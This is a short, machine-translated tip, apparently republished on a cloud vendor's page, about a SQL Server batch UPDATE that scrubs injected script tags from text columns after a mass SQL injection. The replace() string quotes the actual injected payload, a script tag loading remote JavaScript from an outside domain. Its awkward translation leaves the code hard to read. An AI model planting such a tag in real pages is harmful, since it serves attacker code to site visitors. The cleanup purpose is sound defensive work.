SQL batch modify database tables

Source: Internet
Author: User

Here is an example of where you need to modify it.
A. xtype in (167,231) 167 and 231 are the xtype values of varchar and nvarchar columns found in the policypes system table. If other types of columns are also injected, add it to the backend of 167 and 231 as needed.
Also, update statements
Set @ sqlstr = 'Update ['+ @ tname +'] set ['+ @ colname +'] = replace (['+ @ colname +'], ''<script src = http: // w <script src = http://www.chliyi.com/Reg.js> </script> '','''')'
The <script>... </script> section in is modified according to the actual injected content.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.